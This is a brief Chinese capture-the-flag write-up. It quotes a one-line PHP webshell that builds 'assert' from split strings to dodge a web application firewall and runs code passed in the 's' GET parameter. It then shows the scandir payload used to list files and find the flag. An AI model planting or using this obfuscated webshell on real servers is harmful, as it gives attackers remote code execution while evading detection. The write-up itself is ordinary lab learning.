给坑了一会,这过狗一句话可以
$poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
进去后一片空白,什么提示都没有,就那工具去扫,也没扫出来,后来看看wp发现,这个过狗一句话居然是提示,get传入s就能执行命令,绝了!
?s=print_r(scandir('./'))
直接看到目录下有个flag文件,直接url访问就行,我裂开